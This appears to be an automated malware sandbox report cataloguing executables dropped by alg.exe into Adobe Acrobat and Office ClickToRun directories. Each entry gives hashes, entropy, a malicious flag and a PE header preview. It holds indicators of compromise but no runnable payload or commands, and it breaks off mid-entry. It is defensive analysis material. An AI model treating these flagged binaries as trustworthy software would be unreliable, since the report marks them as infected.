Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$........... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1515520
Entropy (8bit):	5.411766317910722
Encrypted:	false
SSDEEP:	24576:MGqVwCto1Gm5WgvsqjnhMgeiCl7G0nehbGZpbD:ZZ1GmUsDmg27RnWGj
MD5:	2630FFE7565613E3EBAEDEF09775F07A
SHA1:	2F10B9C89372384D7D90AC7690B80E39563161C5
SHA-256:	DD26CF1C27C7B305B8326760CCAF23CC3A5E032DB5DC2689C24F5E2A2B78ED82
SHA-512:	0D87E978A941997DB7DA5C146E8C20A55934A5575A9969B90CAD51F705740A3C7D76B198A14E06BDED11D2F69A0A99523598EE9A303B3336E074DCEC348605F0
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@....................................hL.... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1253376
Entropy (8bit):	5.157400454099244
Encrypted:	false
SSDEEP:	12288:8WBWrXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:8WBWrsqjnhMgeiCl7G0nehbGZpbD
MD5:	C5D6E2298E810AB21826DC445B0E585D
SHA1:	49FB23346ADF414AC6A496410771E61F4B0E610F
SHA-256:	BCC8495C51F1EA6262E1788373D5DEBF14EBA2FE2206ADE7F53B897D2DF9E171
SHA-512:	344783A86FBD748A3F136BE8F80B18E1676883ECCCAF48BF91AB9776DCA6C819F105DEC4F22369FACEE9308F9FC6B408AF58606583F419DBD6CC02344601D98D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................`............ .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1683968
Entropy (8bit):	7.228481734147689
Encrypted:	false
SSDEEP:	24576:cf9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa0csqjnhMgeiCl7G0nehbGZpbD:c+GtCi27mVTyT+a0IDmg27RnWGj
MD5:	9BE097BFB78D5679BB7D65BDEB89B4C6
SHA1:	717479E0BCCE83DEADA4210389C234D14DCB9D6C
SHA-256:	D5430F1CF27615671A8282723E32FCA41D86C4A1BA845924897D47D92EE9B024
SHA-512:	09C8A8B7D8F749B1FC7FBAD0348D6E48B1FA8AD66402A280F9C8B5A23470BBB06B5BF908B0A879E0DA751FDC0B5B526779BD5BBB55413D76B89BBF5ABF7FFB21
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@.....................................R.... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3110912
Entropy (8bit):	6.649660908578686
Encrypted:	false
SSDEEP:	49152:XU198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYrDmg27RnWGj:I2NfHOIK5Ns6qR9hD527BWG
MD5:	0FBDA399CDB09ABA88E2ECFF6D9F86C9
SHA1:	EAC06FB0E94C7595335BD12DE2D2D53C3C1836BF
SHA-256:	391305B77C95DC6DEF38713E112B796A481A88B30554A75F2EC925561719ED41
SHA-512:	9F6EBCE4E7FD2804D78775F6DA28CEFA440A0C785D1D35E10DCE9BA30E417844353D36F1F6FDE02CACA878659CA759F0474D9B591FBAAB675D0BC379102EA811
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0.....>D0... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1588224
Entropy (8bit):	5.5319119693970356
Encrypted:	false
SSDEEP:	24576:zkcWTUQcydfsqjnhMgeiCl7G0nehbGZpbD:zhKUwDmg27RnWGj
MD5:	26365DC34B3ADE16CF7E2CEFC9B29529
SHA1:	C0691D0811B85955BC44CBBC915843585005ACCF
SHA-256:	621DE7A465E7A3E6F99384B33710239EB06506EA8DF241355D0CC70394DF7642
SHA-512:	A7D8E0FD6A7B31BCC1D55B29F61216A36F56C0AFB821E13B923BF2ECDE6E7F438ECFFC70D49A42D92B013AA4437C0C33D2AC3713DB11C914CDE1BFF0C20642F1
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@....................................aF.... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...`...@...P..................@...................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1338368
Entropy (8bit):	5.352644952591373
Encrypted:	false
SSDEEP:	12288:OfY+FUBsXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:OA+qBssqjnhMgeiCl7G0nehbGZpbD
MD5:	41427E4388026912714D894415BF30EA
SHA1:	C6ADF94C3342AD65ABA7E4537BC2B916565550E9
SHA-256:	92A532B68FC0B761A7635ACBF092246D1839E68059AC627B58788542B3C87239
SHA-512:	72EF73FB9703EC024FDB6C24DF30879D8F5D49302FA92B9DB6CAB72917107381B502DFE78B7CB6FFD345B945463C6331CEE7C616DEEFEA01F33A06765E5275E4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@.................................................................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc...p...@...`..................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1143296
Entropy (8bit):	5.022667341718373
Encrypted:	false
SSDEEP:	12288:gXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:gsqjnhMgeiCl7G0nehbGZpbD
MD5:	4FABF25521244DA260C6C684D635BEDC
SHA1:	09532E184AA1470135A1F17155BC2C04A2621C4D
SHA-256:	DC9A268C27ABB1120B4B41DC61C78D6BE4C7C0B2C5E1B815AF676CA5B4190F00
SHA-512:	E86EDE4ADF218810DAC624654F228DF876946B55BBD0FD692525470E47BCBFA378E8D47DBFCAD41F1156231A34377FC03E6CECCD50363AC838D58A4A36D7773A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@.....................................c.... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...\|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...P.......@...2..............@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1161728
Entropy (8bit):	5.047146724108164
Encrypted:	false
SSDEEP:	12288:lAXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:2sqjnhMgeiCl7G0nehbGZpbD
MD5:	C6394AA15441BAAED83F9FD2C35120F0
SHA1:	B5F07E3F1DCE01701BF1E111FCFB3D2BF49AE016
SHA-256:	0DDD637F92123CC9F6C8EEFE091756F3D8BF69CE1029C9D12DADCDB2F0FFF1C2
SHA-512:	70B778F1DD47CB61B8ED3EA65CF8695E221EDA51E3B33D74B098156687BF8251CAD4EC3B3643CA57A478E22D20968805E9941C159274A90ADE8595B44C267F80
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..\|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@.......................................... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...P.......@...z..............@...........................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4151808
Entropy (8bit):	6.4997800061798845
Encrypted:	false
SSDEEP:	49152:XtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755NDmg27RN:XjEIa4HIEWOc5LD527BWG
MD5:	C45A3684EB0E717394EB5661637AB456
SHA1:	8F2907C457E23F06DA87BC3F0BDF3D28D79B1EDA
SHA-256:	0460C6B2E9631C028ECD2EF10920E12A13AF05D8FC200E1D92BA4F9DB19A1795
SHA-512:	773D1788255889D0CED78F9CF0CA7A28E1A8FEAB6C196EAC15F265C91CEE1F1B27E235A30193C2E11F62F93BFA286F594C9AA82C4F53F2C5C5123C71781E7E15
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59941376
Entropy (8bit):	7.999367307361931
Encrypted:	true
SSDEEP:	1572864:RQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:CXhwMhe6AABPiQwF6xQ22R
MD5:	443E1C2F6E6B8D02BCB8B1C4948FFD4C
SHA1:	4D87D28B04E9030855136BFDEE2F01B15C771E06
SHA-256:	555398E6D61A402315AFDFC46EC1A8B2F3644803088D3029E395F107D8D505C2
SHA-512:	881FBA59FD94E73F0BE83673F3128433707A1E3B83B174A5BFFFFD44818298280540CF4895A6688FAC0CED704D9D9D148EABCA1F7BBB071479876F5F59238ACD
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0......o..... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1230336
Entropy (8bit):	5.185592748309472
Encrypted:	false
SSDEEP:	12288:EejVWYUAAXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:VjkY7AsqjnhMgeiCl7G0nehbGZpbD
MD5:	C97F4212CEB8ABD59D8D4E6AD4A122E9
SHA1:	2C28AE43009BB4B0496D4BF9C301458FC2C7BB6F
SHA-256:	63F99EE16468BF141E1D9F899A97850EF92C4A421E30076B3CFCE4719A3306B2
SHA-512:	43FF4D9E7DBE025119FEAAA6C20EC2E4FA742F2EF0D7D43540FC76D443F1E74064174BF61AAB66056C57A140E142B361798BAD7CE8337491A518B20C9D63A003
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@..........................................................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...`.......P...v..............@...................................................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1384960
Entropy (8bit):	5.3777938013872735
Encrypted:	false
SSDEEP:	24576:/xwSJhkrmZsksqjnhMgeiCl7G0nehbGZpbD:/y+krKsADmg27RnWGj
MD5:	E76527B860D04A921D4297B7CC9B1040
SHA1:	356695EDAAE2EFCE697F591485CA1756A2541A2C
SHA-256:	39AFE5DB3379C9C93DDF6610E0A5ECE15F9AB01019E10B2825959E59F9600108
SHA-512:	19EBB2782818B50CCECA48B3B36A5FDA170B0092035B2EF827B1C8B06D5BF628E99AABF470E404CE96367C35A5B015D86D3E4E110C12146D08CA5AB028721906
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@.......................................... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1649152
Entropy (8bit):	5.632722528390367
Encrypted:	false
SSDEEP:	24576:eHQJLIRgvsnNFsqjnhMgeiCl7G0nehbGZpbD:eHQJL345Dmg27RnWGj
MD5:	E1B4A30921A19AC945A26A1D75B14ECB
SHA1:	A02FBA80F85AD44F28F35D23F2F0643EB1327314
SHA-256:	16ED29664F2B911EDC822C01AA723C91132C94E1EE1393A3F8CCE50B0E7BEDFA
SHA-512:	175789D9450AD124AE8B77D18EA92AE5D4C621AEC1C7609DB6D242AF6B7DD282F3F7B3D02A943E30D11406D9886E4539F1A69DEE5F8DB583009F22DC6FA6FFFE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@...................................."0.... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5365760
Entropy (8bit):	6.450970308574415
Encrypted:	false
SSDEEP:	49152:VUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1ks:CWmXL6DEC7dRpKuDQbgOD527BWG
MD5:	2B2FA92454C7F91E716FF87C801C34D0
SHA1:	74F71FB2A976B5DA36FB720B5AD4DD13789D2DDE
SHA-256:	AC2D06F60FE276707B6BB4727D40D570A07CF44BF76890517F079E4FB87D0C7C
SHA-512:	41F1595A478470EFDA6969EE773F5B35F4F8F2EEAAB7B3CF703DD1BCB94E9FA0C7EB214AB591E849D061BDB20508DFEF421F732ABAA4751854136013009A5257
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R......0R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................

C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3163136
Entropy (8bit):	7.972780547460561
Encrypted:	false
SSDEEP:	98304:KrZ23AbsK6Ro022JjL2WEiVqJZtD527BWG:EJADmmxL2WEoCZtVQBWG
MD5:	03F8C84BC2DA7D4ACC98F0238FF12EE3
SHA1:	596F63C315F01688DECAEC2C742C6AC6AAE2461A
SHA-256:	52CE94EEEB9DC461629F6FB2353B2EB331D02FE6B042008A9E8731F1FC5C66E7
SHA-512:	CDDB1BAB643987C8C32A32C8BCBA5B1E3E46B6185B10B72C7954DC720435AF4E53E4EEC6474DC1BB2B7DFF1EFD0FCB7B171B2D2DCA08BBAE9E0B909A797BCAD5
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1.....f{0.......... .....................................0............................!............................................... ...............................text....\|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1213440
Entropy (8bit):	7.204911337333339
Encrypted:	false
SSDEEP:	24576:4frYY42wd7hlOw9fpkEE640sqjnhMgeiCl7G0nehbGZpbD:Vz9xrSQDmg27RnWGj
MD5:	40B5A57E4BCCE1C1DF2E1EEB65C6D701
SHA1:	CACE441796B3590EEA7EA94A892E3FE8303870FB
SHA-256:	ABE7031C0974A7A1D66E8602AC0F7041843ABBEEFB1DEE53FD7C9E88F8FAD5C1
SHA-512:	E32413B190FB903AA1D25AA9C9ECB546D71EBA367FA6B2F8F186F01BA1F1D5DA8DCAD57383D6DA35A28392778FEB426BCE4EC47C8ECAE83FBC65BE5D2C08DC37
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. ........... ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1388544
Entropy (8bit):	5.2729322605144455
Encrypted:	false
SSDEEP:	12288:0wkNKiZ+R2GGNUbTF53Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:0zNKUE53sqjnhMgeiCl7G0nehbGZpbD
MD5:	58CBC415CEF02495BC038B3EB2E0FE6F
SHA1:	43CC35FCDC8396509304B2B97C084C9C449CEFE0
SHA-256:	8AF31C2BBF61560F6B0EF9CCA5EAD7A882070D3AA7BD31FAA5799A585BC21C81
SHA-512:	67026323AE265D3B5FC7D741211BA8A3F9FD3C743CBC53C35FFF4E07A73ED132CD5FB296E498B5853FF3032775FA562D8824E7446C025F02C6FBC1F81F3E850A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................P........... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5855744
Entropy (8bit):	6.574331400453208
Encrypted:	false
SSDEEP:	98304:QALuzDKnxCp3JKNrPJzruaI6HMaJTtGbiD527BWG:raGg3cFPIaI6HMaJTtGbiVQBWG
MD5:	379301986DD8D3BFD4C6021929C3B2B0
SHA1:	C7C0BC5B7C5F0B3A9643A6DE5038294CDEE94789
SHA-256:	61213A3C44831906AAED90538AD37119FFF4C63749F47688524EFDCA74933A30
SHA-512:	C8FCC5A3EBAE56538E03EF1643521A18EBFC681F629B9D8F16AAC6D4BCEFB279BCBD05575A00E889FB7F611FD7785A70B073BD6088292AA38E1348CF9C177496
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y.......Z... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1312768
Entropy (8bit):	5.356059311128652
Encrypted:	false
SSDEEP:	24576:mXr/SVMxW4sqjnhMgeiCl7G0nehbGZpbD:O1xtDmg27RnWGj
MD5:	A0F1127930F707EEAE4104451526D7A5
SHA1:	C4BFB6AB96EC82007B5673E065357E24AF01305C
SHA-256:	3FDF151E2ABFB20F275259B487C49D9DF5321EBF7F3F1658BF864CAE3DEAE1EE
SHA-512:	99979470219A8066113832FF5E978007B31248E938D4A8910D8525808E29AA1D248586CAFFF776770398EDAD770014C9B3A98B9ADEA947FCE12922C2E3D26190
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................P......C............ ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27533312
Entropy (8bit):	6.248636531697901
Encrypted:	false
SSDEEP:	196608:2hRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQO+VQBWG:2hRCpGpMJMrbp8JjpNdNlc5yB
MD5:	D2720A5B78A4AD214228207B266735CC
SHA1:	69E909DB3C1E4581ED6AD6718E92D9591C51A7E5
SHA-256:	B7A040EC39E2CB0733FD013159F791E69D234C267E4E046809DC9CABA7594E8F
SHA-512:	1E1F7087E60CB615661D08DFF39D699EB4DEC2E7D359AAE4B4E4E9411C24137C6233D330D7C7906080632200FC43E44C567B0DEB36596998B31A2EF84E4C80ED
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.\|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@....................................`X.... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2199552
Entropy (8bit):	6.788993797488298
Encrypted:	false
SSDEEP:	49152:p83pZ3kd0CuEeN0LUmRXzYs65mmDmg27RnWGj:hKuUQY15pD527BWG
MD5:	EA3EA4AF5BCC328BE31F0A5C4A4B50FD
